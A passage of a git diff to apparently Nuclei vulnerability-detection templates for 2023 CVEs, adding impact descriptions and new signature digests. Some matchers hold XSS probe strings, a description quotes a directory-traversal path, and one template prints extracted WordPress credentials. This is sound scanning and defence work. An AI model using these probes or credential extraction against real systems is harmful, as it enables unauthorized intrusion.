+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or updates provided by cPanel to fix this vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 400
-# digest: 4a0a00473045022058bc6c41316a949532f9cc34bd7d0b5264598c491826c690505cdeae750a35ec022100d688457ef68b8ba57bb3f59a90837941f97e619eb9d876e217928c89826e662e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022015172cff4e8615aaee52aba6d8a16924921ff99244fa4c91d635c964e9493d0002200c79712c8e690654e1a4826474b97987a75d14e9eb5cf5caf42726fb8b46e38b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-29622.yaml b/http/cves/2023/CVE-2023-29622.yaml
index 263797b770..2dc688f492 100644
--- a/http/cves/2023/CVE-2023-29622.yaml
+++ b/http/cves/2023/CVE-2023-29622.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Purchase Order Management v1.0 was discovered to contain a SQL injection vulnerability via the password parameter at /purchase_order/admin/login.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
           - 'contains(header, "text/html")'
           - 'contains(body, "status\":\"incorrect")'
         condition: and
-# digest: 4a0a0047304502210081b1c59e21ecf610a6222a957e99ba4f6fe4b9e8570c1b6b88484d961ca5fc1102205f2e67cff2b98ca2e4806e766c1d33e2ff1bb0893e5dc3e9e723822e307c335a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206485ae8d6ab42ef1fd32f50a8be4af7eb955d8537fe8af1e38e620b3f8829c79022100d71aa3714f34fc228c3c54bd2c9e6054083d39081b9313238eddbdb6ddabd9ce:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-29623.yaml b/http/cves/2023/CVE-2023-29623.yaml
index f2b2a3b53b..f016b66f39 100644
--- a/http/cves/2023/CVE-2023-29623.yaml
+++ b/http/cves/2023/CVE-2023-29623.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Purchase Order Management v1.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the password parameter at /purchase_order/classes/login.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402203258be6eccdd2e69dce242ee7d53da49ac708bcdeadb973c4d0f32ca61900f6c0220028aa460f0504b79bae7dcfb746daef86f6daa6101cfafa5ef7a603f7dd9a082:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402203333a59948f759a0ead93290c1b301ba9f83fe8eda0317c9008bb7c7cbdcede402201a9adcb66202839b1d3469cf53b4c866e428c07c2ba0cfb9c476763198698c86:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-2982.yaml b/http/cves/2023/CVE-2023-2982.yaml
index fe05d50f3b..15da03f5aa 100644
--- a/http/cves/2023/CVE-2023-2982.yaml
+++ b/http/cves/2023/CVE-2023-2982.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     The WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 7.6.4. This is due to insufficient encryption on the user being supplied during a login validated through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they know the email address associated with that user. This was partially patched in version 7.6.4 and fully patched in version 7.6.5.
+  impact: |
+    An attacker can gain unauthorized access to user accounts, potentially leading to data theft, privilege escalation, or other malicious activities.
   remediation: Fixed in version 7.6.5
   reference:
     - https://lana.codes/lanavdb/2326f41f-a39f-4fde-8627-9d29fff91443/
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 302
-# digest: 490a0046304402206263d2817f94523a771e3fdd9967eb09c6147e785fedd1f2c171e730280abe6b02202fce68104fcc886a116afac7702a549a4025a2a086a0806dbbefdc9e45d29ccf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220020ca02737854c69f495f07e5196eec444f6b22539711b879aa7a6887b12556802202f27e164d8b06d940fe4ad0bd4225e104dd3c86702078f9d1fff1bb54cca55f4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-29887.yaml b/http/cves/2023/CVE-2023-29887.yaml
index 5dedf91cfa..ef9659afd7 100644
--- a/http/cves/2023/CVE-2023-29887.yaml
+++ b/http/cves/2023/CVE-2023-29887.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     A Local File inclusion vulnerability in test.php in spreadsheet-reader 0.5.11 allows remote attackers to include arbitrary files via the File parameter.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and further compromise of the server.
   remediation: |
     Upgrade to a patched version of Nuovo Spreadsheet Reader or apply the vendor-provided fix to mitigate the Local File Inclusion vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402204f10cc6bb2f82b87eda79832e5b7fca6343709f38173a2647456c7ba2cd83caa02205d1af41c119d0f5df681d6b7c050209562d33d90144a39c4463e5af1765c965b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220470409738c385ddbd99b59e6f19140e2e8e65d4845097dcb8967eadaca9079a602206a70d7d879165a4b8b3a541d63768e35ce9f54257866c63851c3ebba4b7690d4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-29919.yaml b/http/cves/2023/CVE-2023-29919.yaml
index 742d4234da..a70ebf48fa 100644
--- a/http/cves/2023/CVE-2023-29919.yaml
+++ b/http/cves/2023/CVE-2023-29919.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     There is an arbitrary read file vulnerability in SolarView Compact 6.00 and below, attackers can bypass authentication to read files through texteditor.php
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Upgrade to a patched version of SolarView Compact or apply the vendor-provided security patch to mitigate the LFI vulnerability.
   reference:
@@ -55,4 +57,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022000a8835ec6491458fed3c81fee7d8993337c159a5edfa535bb31fbe3d915026002201611dc5110603bf31983671f4c8955b28549693c26b202b07ac06baf4a7d0149:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206af6c95789f50359eae35bcbb6fcf42a47137cef7560fcaa9642f4111d7ccd6102210086bfa3f4148e582f7e1ec2d9c973b8f1b737c65cae0147d675e872ee493fd57a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-29922.yaml b/http/cves/2023/CVE-2023-29922.yaml
index b42e85ce64..52e3fed8ba 100644
--- a/http/cves/2023/CVE-2023-29922.yaml
+++ b/http/cves/2023/CVE-2023-29922.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     PowerJob V4.3.1 is vulnerable to Incorrect Access Control via the create user/save interface.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the application.
   remediation: |
     Apply the latest security patch or upgrade to a patched version of PowerJob V4.3.1.
   reference:
@@ -56,4 +58,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022037dcc33527bff15b261637a121db5a50f00f13b3fb72257ce22c7061c59b3c440221009fd2569d604d62b19631d44ad9eb1f4cef616eef2528ec88720c6aa75fb6f081:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022041691c30018cfc9a8682e6b3a39bed7130a316d97c5e239efbfd25f1abd0919b0220670592e3c64b20e93601de99a4b30f9a7718ee96979298f6fc1eac138c4484bb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-29923.yaml b/http/cves/2023/CVE-2023-29923.yaml
index fa4251fac9..b0f63da447 100644
--- a/http/cves/2023/CVE-2023-29923.yaml
+++ b/http/cves/2023/CVE-2023-29923.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     PowerJob V4.3.1 is vulnerable to Insecure Permissions. via the list job interface.
+  impact: |
+    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information or perform malicious actions.
   remediation: |
     Upgrade PowerJob to a version higher than 4.3.2 or apply the necessary patches to fix the authentication bypass issue.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100eb7b3153935a7f073ba2744cd7733e517cf59bb9a471f33355727685eafba79a0220079d443f740f0adfaf18cc660d13e25969bf9bbbb89dca1dfc53f65190c6faef:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b360a37692144d0b839ee709d5984db771131ad60ea6d1cac910750acf5dff0502210085f995fc5ae699386889be07890757328726cc358534091c7a77474ada90353a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-30019.yaml b/http/cves/2023/CVE-2023-30019.yaml
index b091169388..2575597736 100644
--- a/http/cves/2023/CVE-2023-30019.yaml
+++ b/http/cves/2023/CVE-2023-30019.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     imgproxy <=3.14.0 is vulnerable to Server-Side Request Forgery (SSRF) due to a lack of sanitization of the imageURL parameter.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution.
   remediation: |
     Upgrade to a version of Imgproxy that is not affected by this vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 422
-# digest: 4a0a00473045022059e9dc04788bf96ca3ab5e7e5339232b3a9d1053b1146894041826fd1cb9b6ce022100ac240d6e5adbb4423cddcea2e5b27b5c3c706acd7836035e21040338942d6bef:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210099df4ee9e647d7babf7640361fd679acba8a2cda25ec823ee0c0de4afb2be4a7022100f3838205b2a0d62ad645ebe898a09932baa15daa64ddd509acdce2377220d97e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-30150.yaml b/http/cves/2023/CVE-2023-30150.yaml
index 9958ed3a1a..1c3efab831 100644
--- a/http/cves/2023/CVE-2023-30150.yaml
+++ b/http/cves/2023/CVE-2023-30150.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     PrestaShop leocustomajax 1.0 and 1.0.0 are vulnerable to SQL Injection via modules/leocustomajax/leoajax.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the PrestaShop application and its underlying database.
   remediation: |
     Apply the latest security patch or upgrade to a patched version of PrestaShop leocustomajax plugin to mitigate the SQL Injection vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
           - 'duration_2>=6'
           - 'contains(tolower(response_1), "prestashop")'
         condition: and
-# digest: 4a0a0047304502203d1fc09511a87db9049667879af1ed7ebc893dc2b8a2f06b846776e8dc56e0ff022100c6727dd270309de562de36923989575e6e8f0c1be667c3fb127ddfe67b462553:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402203d58359bda4a391139b99cec48099838945e2eabcc90570444a3cd424389ee5702200a597e329796e07d74e75b3c55f2eaf0f9887c709bccc3a448a1f6b67fb2780d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-30210.yaml b/http/cves/2023/CVE-2023-30210.yaml
index 7546fb785d..a1ccdac2f2 100644
--- a/http/cves/2023/CVE-2023-30210.yaml
+++ b/http/cves/2023/CVE-2023-30210.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     OURPHP <= 7.2.0 is vulnerable to Cross Site Scripting (XSS) via /client/manage/ourphp_tz.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Upgrade to a patched version of OURPHP (7.2.1 or higher) to mitigate this vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100e1281bbca69c72f32ee580d3f37af2791a5b3df75d69f645f70dd59dd050b6d202207c743c0a0860fce0c2c1f034fb454fac0b5467ef02d91f32a86bf73142ab1715:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022063b9772e62b044c746936e711711248664cc7cef074588208a1b0d7efc2ddc62022100a9bb297a1e1c9f8278a291a0c276922e91e5a2d6e67356e490cf8e5cb7b5e3db:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-30212.yaml b/http/cves/2023/CVE-2023-30212.yaml
index d67a30cb12..e604e1a839 100644
--- a/http/cves/2023/CVE-2023-30212.yaml
+++ b/http/cves/2023/CVE-2023-30212.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     OURPHP <= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Upgrade to a patched version of OURPHP (7.2.1 or higher) to mitigate this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502210081549b0c71b1d57c550019d3f47f31c37f8fe9ec4a2184dabf43b8c136e56c440220777e55eb53e814f14c153ccc153af621a0f88d03cac6359376cbd2db81883462:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200cb2ea19de2aa1a1277a61d701653c06e98e3ff125bf280d83246e3b0107b43a02203996c6331b4f922aecdd173e259dd901b5b2ac1a06f987effe3a09c25153da4c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-30256.yaml b/http/cves/2023/CVE-2023-30256.yaml
index e265b2b320..90da2790d6 100644
--- a/http/cves/2023/CVE-2023-30256.yaml
+++ b/http/cves/2023/CVE-2023-30256.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Cross Site Scripting vulnerability found in Webkil QloApps v.1.5.2 allows a remote attacker to obtain sensitive information via the back and email_create parameters in the AuthController.php file.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100a03ec3d9ebee24689b73ccca427ce22ab9cf9e7e590dff6bb06a6047e18978c3022017dcabb866c43668b984ae71b8e9cb6091ead6ae462bec26760c6945fe96479d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c2dbed592d69f6dce5e149f115ce95239fe7ee6d240fa21974827261bd81c3e3022100adba995ef220d882ab57a534708bfa7cf8b238084c18a69305d33da92cbbe343:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-30777.yaml b/http/cves/2023/CVE-2023-30777.yaml
index 8fc7232993..4f2853ca57 100644
--- a/http/cves/2023/CVE-2023-30777.yaml
+++ b/http/cves/2023/CVE-2023-30777.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Advanced Custom Fields beofre 6.1.6 is susceptible to cross-site scripting via the post_status parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: Fixed in version 6.1.6.
   reference:
     - https://wpscan.com/vulnerability/95ded80f-a47b-411e-bd17-050439bf565f
@@ -49,4 +51,4 @@ http:
           - 'contains(body_2, "onanimationstart=alert(document.domain)//")'
           - 'contains(body_2, "Advanced Custom Fields")'
         condition: and
-# digest: 4b0a00483046022100e17f2f0aa9fb2f79e1413e003f162b98574690b20f14a044c4dbd91cdebf7f6f022100c1a95d0cc1aed9449600e5dc3884cc17790947a5de794bf1073ebe876febba85:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100fe2f9a47fc9beaa6c4fdfe6bfcf14018b0a9b49f2965e859e1fa2d901b9eced9022100f55fca6980bd5766115bb710aae6a20f361ac51cfd7867cf9aafd6e27b90a308:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-30943.yaml b/http/cves/2023/CVE-2023-30943.yaml
index d22774bc39..7e0ecb6ab7 100644
--- a/http/cves/2023/CVE-2023-30943.yaml
+++ b/http/cves/2023/CVE-2023-30943.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     The vulnerability was found Moodle which exists because the application allows a user to control path of the older to create in TinyMCE loaders. A remote user can send a specially crafted HTTP request and create arbitrary folders on the system. Moodle versions 4.1.x before 4.1.3 and 4.2.x before 4.2.0 are susceptible to an unauthenticated arbitrary folder creation, tracked as CVE-2023-30943. An attacker can leverage the creation of arbitrary folders to carry out a Stored Cross-Site Scripting (XSS) attack on the administration panel, resulting in arbitrary code execution on the server as soon as an administrator visits the panel.
+  impact: |
+    Successful exploitation of these vulnerabilities could lead to unauthorized access, data theft, and potential compromise of the Moodle application and its users.
   reference:
     - https://www.sonarsource.com/blog/playing-dominos-with-moodles-security-1/?utm_source=twitter&utm_medium=social&utm_campaign=wordpress&utm_content=security&utm_term=mofu
     - https://nvd.nist.gov/vuln/detail/CVE-2023-30943
@@ -76,4 +78,4 @@ http:
         regex:
           - 'name="logintoken" value="([a-zA-Z0-9]+)">'
         internal: true
-# digest: 4b0a00483046022100855cf79c23593e74bccd0bb8c435f0c53bac294f739fc8755b824c035bcf4b0202210096ae91f07a7fb2b7070eccee414f32a29e4167c8c993da9673c799e33092d594:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220724b37083d201e22eba8d037049a247e494e9909c0ae60a8c4946d0e577d6f6b022100d3ef9b46eed9adf6dca8cc8cba7685744a916cfa7e59a4c682c347a7fbaf5543:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-31059.yaml b/http/cves/2023/CVE-2023-31059.yaml
index 49289a2645..186834ffda 100644
--- a/http/cves/2023/CVE-2023-31059.yaml
+++ b/http/cves/2023/CVE-2023-31059.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Repetier Server through 1.4.10 allows ..%5c directory traversal for reading files that contain credentials, as demonstrated by connectionLost.php.
+  impact: |
+    An attacker can read, modify, or delete arbitrary files on the server, potentially leading to unauthorized access, data leakage, or system compromise.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in Repetier Server.
   reference:
@@ -43,4 +45,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100e6889e089182801b81cb52e52591276e3561d59e3555539dbfff8861b5bc866502204d81569c887ed18e226a52768be720c05799abcafdf98ff282c7ae0853b18ee5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201a9b3276e243e1359a1cd9764fa192c0f45ddce926c96b8c92a56283d629128b022100d483333a621e6bd99f8e3cfbc6e5ca6834f307a858c4d1802b4fa481d143e3d3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-31548.yaml b/http/cves/2023/CVE-2023-31548.yaml
index e0203f8852..e5d1c7d2f3 100644
--- a/http/cves/2023/CVE-2023-31548.yaml
+++ b/http/cves/2023/CVE-2023-31548.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     A stored Cross-site scripting (XSS) vulnerability in the FundRaiserEditor.php component of ChurchCRM v4.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
   reference:
@@ -50,4 +52,4 @@ http:
           - 'contains(body_2, "onfocus=\"alert(document.domain)\" autofocus=\"\"></td>")'
           - 'contains(body_2, "ChurchCRM")'
         condition: and
-# digest: 4a0a004730450221009c875363419b37b79bead9bafb775a210ee6ae9362e379d76075e8c761364ce102203780811bdb475a0cc5d914cd1df3f8be764a060fab5584b3e2ebf8efc5c84c25:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ac7f23a424e8adcccd3b09f6a6d285a9a4ae735efab05c68d2fe7ae078087c5f022100e166cbfa86f70f64a88c16df7d7ecf17293b6419a6972a877ec623964694c827:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-32117.yaml b/http/cves/2023/CVE-2023-32117.yaml
index 0a26dd0511..33a11b3363 100644
--- a/http/cves/2023/CVE-2023-32117.yaml
+++ b/http/cves/2023/CVE-2023-32117.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     The Integrate Google Drive plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several REST API endpoints in versions up to, and including, 1.1.99. This makes it possible for unauthenticated attackers to perform a wide variety of operations, such as moving files, creating folders, copying details, and much more.
+  impact: |
+    Unauthenticated attackers can access and manipulate sensitive data in Google Drive
   remediation: Fixed in 1.2.0
   reference:
     - https://github.com/RandomRobbieBF/CVE-2023-32117
@@ -44,5 +46,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 490a00463044022042069a2ef6cb508b921b763e369d20dc6cf7c8cc6cc137af9922fb155772b5d302206184184bbde00c31a18511d9083306c193990574a01455e25597a22fa524b0ec:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220720cc9500eac10bd738c6689a1daa0de0eb4dc2a5c2f69d6dc28a5295eaf444302202d0f5786f6935f70b2633f6c4e75192c4ca7f04afc7ec34d4835dced5c34fbfe:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-32235.yaml b/http/cves/2023/CVE-2023-32235.yaml
index 3c15c0953e..ccb5d63285 100644
--- a/http/cves/2023/CVE-2023-32235.yaml
+++ b/http/cves/2023/CVE-2023-32235.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme's folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js.
+  impact: |
+    An attacker can exploit this vulnerability to access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information.
   remediation: Fixed in version 5.42.1
   reference:
     - https://github.com/advisories/GHSA-wf7x-fh6w-34r6
@@ -55,4 +57,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220196c8dbfd63c287b7c1f6b4b400d9e6acae11f4763bb43e3ce4d7dce7a968570022100b1007a98ec0270ab893cdd87d9ad601937d800d49fbb7f0586d8057d86cebd9b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ce8e1f0fd3befe79825e1ec2710a6afadc535c74fe9d268b4f1b70d92d7d18c802202d5c054bd17904ccbb59de731a4fa70dc7252c92254f4ac365fea0ec9cf4d129:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-32243.yaml b/http/cves/2023/CVE-2023-32243.yaml
index 6f235a9271..1cc37bed8b 100644
--- a/http/cves/2023/CVE-2023-32243.yaml
+++ b/http/cves/2023/CVE-2023-32243.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Improper Authentication vulnerability in WPDeveloper Essential Addons for Elementor allows Privilege Escalation. This issue affects Essential Addons for Elementor: from 5.4.0 through 5.7.1.
+  impact: |
+    An attacker can gain unauthorized access to user accounts and potentially take control of the affected WordPress website.
   remediation: |
     Update WordPress Elementor Lite plugin to the latest version (5.7.2) or apply the patch provided by the vendor.
   reference:
@@ -106,4 +108,4 @@ http:
       - type: dsl
         dsl:
           - '"WP_USERNAME: "+ wordpress_username + " WP_PASSWORD: "+ password'
-# digest: 490a00463044022065e81039561eb9744d106e4bc99f3278cc9a11cfe966eaf3760072bca76d26b202204f62eeb4b7e06de95605ba76e4c7b65dff4ef99c9677a418c6bb4c986d878444:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e2c343f2db0148f56db37a8a5c86b1ebb297f3d849ccec6043628ac6b0b6156202207e2ee63aa730be904ef9a13e1c26fa914c709455af754f4f4de71ac325743d67:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-32315.yaml b/http/cves/2023/CVE-2023-32315.yaml
index faa440a878..5aee7724ae 100644
--- a/http/cves/2023/CVE-2023-32315.yaml
+++ b/http/cves/2023/CVE-2023-32315.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Openfire is an XMPP server licensed under the Open Source Apache License. Openfire's administrative console, a web-based application, was found to be vulnerable to a path traversal attack via the setup environment. This permitted an unauthenticated user to use the unauthenticated Openfire Setup Environment in an already configured Openfire environment to access restricted pages in the Openfire Admin Console reserved for administrative users. This vulnerability affects all versions of Openfire that have been released since April 2015, starting with version 3.10.0.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to gain unauthorized access to the Openfire Administration Console.
   remediation: |
     The problem has been patched in Openfire release 4.7.5 and 4.6.8, and further improvements will be included in the yet-to-be released first version on the 4.8 branch (which is expected to be version 4.8.0). Users are advised to upgrade. If an Openfire upgrade isn’t available for a specific release, or isn’t quickly actionable, users may see the linked github advisory (GHSA-gw42-f939-fhvm) for mitigation advice.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402203c79aa5395ed85c37b9bca15c04b1cc7b60bb44d37c67c85afa39b36cf79a97702207d8b2eecb88e6c6e7edc8f5ea2274a2a5797db4ac8fa6615065480fb1e41d2f1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022018b6cad590fa6e7953cf787a82b936079101f20d4cab9cbd5fa50e290ae4e2dc02206989cb4dfc0c85ae148a9f6b0cf2fca7128a76f7aef89d53826f59a981254858:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-32563.yaml b/http/cves/2023/CVE-2023-32563.yaml
index 53449a0d31..5a66c6b428 100644
--- a/http/cves/2023/CVE-2023-32563.yaml
+++ b/http/cves/2023/CVE-2023-32563.yaml
@@ -5,6 +5,8 @@ info:
   author: princechaddha
   severity: critical
   description: An unauthenticated attacker could achieve the code execution through a RemoteControl server.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patches or updates provided by Ivanti to mitigate this vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
         part: body_2
         words:
           - "CVE-2023-32563"
-# digest: 490a00463044022078d99f66c9be30de52f49ea213ec421f50382924147ab3434d4b4817100f134b02205f1e2e6cf4d9b0f34b7e9a3d1b8ec4b29f2672e02881514e834dd2fadce3bcee:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502207d691d13397c3d01c04b8f7cb8d17e532009d814bc481a201e8cf7ae4b34ac43022100d9daff89cf1274dd1fdd2358015733065686878f0a6fc98e9b3c5059e079ca66:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-33338.yaml b/http/cves/2023/CVE-2023-33338.yaml
index d71adcda5d..4b3817e0f4 100644
--- a/http/cves/2023/CVE-2023-33338.yaml
+++ b/http/cves/2023/CVE-2023-33338.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Old Age Home Management 1.0 is vulnerable to SQL Injection via the username parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Apply the latest patches or updates provided by the vendor to fix the SQL Injection vulnerability in the Old Age Home Management System v1.0.
   reference:
@@ -45,4 +47,4 @@ http:
           - 'contains(body_2, "Change Password")'
           - 'contains(body_2, "Old Age Home Management System|| Dashboard")'
         condition: and
-# digest: 4a0a00473045022100faf203a324b8be7f095a63d1a17ca24b9a30df46ffde066d6688a61ef25071de0220279e79e1c01f5229d739e6798becd6bf84386c6cfd69e9600be36c5b2534ae58:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100cf384342a6163a0af6518d89ffca4f30d10fdc8ef869530e9bdfb8cde091b9b0022100c31c8e902dbcb91058ad4ed5ebf6719d1ac6a4bd2ee5e64c099d528697bde425:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-33439.yaml b/http/cves/2023/CVE-2023-33439.yaml
